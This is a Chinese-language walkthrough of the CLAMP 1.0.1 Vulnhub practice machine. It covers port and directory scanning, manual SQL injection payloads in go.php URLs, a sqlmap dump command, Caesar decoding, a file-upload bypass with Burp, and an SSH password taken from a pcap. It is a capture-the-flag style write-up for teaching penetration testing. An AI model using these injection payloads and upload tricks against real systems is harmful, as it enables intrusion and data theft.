zoukankan      html  css  js  c++  java
  • CLAMP 1.0.1 Vulnhub Walkthrough

    主机层面端口扫描探测:

    ╰─ nmap -p1-65535 -A -sV 10.10.202.137

    访问web服务 

    使用dirbuster 加大字段进行目录爆破

    http://10.10.202.137/nt4stopc/index.php

    看看这些问题先:

    Question

    True/False Bit

    Baku is the capital of Turkey? 巴库是土耳其的首都

    False

    0

    The beginning of the French revolution is 1798. 法国革命的时间

    True

    1

    Istanbul was conquered in 1435? 伊斯坦布尔于1435年被征服?

    True 1
    Fatih Sultan Mehmet is the founder of the Ottoman Empire? Fatih Sultan Mehmet是奥斯曼帝国的创始人 False

    0

    The founder of robot science is Al-Cezeri? 机器人科学的创始人是Al-Cezeri

    True 1
    Dennis Ritchie, who developed the C language? Dennis Ritchie,他开发了C语言 True

    1

    The function definition belongs to the C89 standard? 功能定义属于C89标准

    True 1

    The other element of the array is 1?数组的另一个元素是1

    False

    0

    Is the maximum 32-but value 2,147,482646? 最大32位值是2,147,482646 False

    0

    Is there an undefined behaviour in the following code? 以下代码中是否存在未定义的行为 True

    1

     二进制:0110111001

    http://10.10.202.137/nt4stopc/0110111001

    稍等跳转到:
    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/

    右键源码:

    访问尝试下注入:

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=1 #true

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=2 #false 

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 order by 5--+

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,2,3,4,5--+

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+

    我们直接用SQLmap搞一波吧,手工真麻烦

    ╰─ sqlmap -u "http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --dbs --batch -D tatil -T gereksiz -C gereksiz --dump

    hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf 应该是一种加密过的字符串,我们尝试Google解密下

    https://cryptii.com/pipes/caesar-cipher

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

    卧槽没有提交按钮,是不是隐藏掉了?

    这里使用burp抓包修改

    http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/af73b4a487065af10015796aa6293880.php

    进行提权操作:

    http://10.10.202.137/important.pcapng

    email=mkelepce&message=Hello+there,+The+password+for+the+SSH+account+you+want+is:+mkelepce:mklpc-osas112.+If+you+encounter+a+problem,+just+mail+it.++Good+work

    password:mklpc-osas112.

     完! 

  • 相关阅读:
    九九乘法表
    User-Agent的获取方法
    web前端【第一篇】HTML基础一(标签)
    SQLAlchemy的简单使用
    MongoDB的简单使用
    redis简单使用
    MySQL数据库学习【第十二篇】pymysql模块
    MySQL数据库学习【第十一篇】IDE工具介绍及数据备份
    MySQL数据库学习【第十篇】(视图、触发器、事物)
    MySQL数据库学习【补充】mysql老是停止运行该怎么解决
  • 原文地址:https://www.cnblogs.com/hack404/p/11344460.html
Copyright © 2011-2022 走看看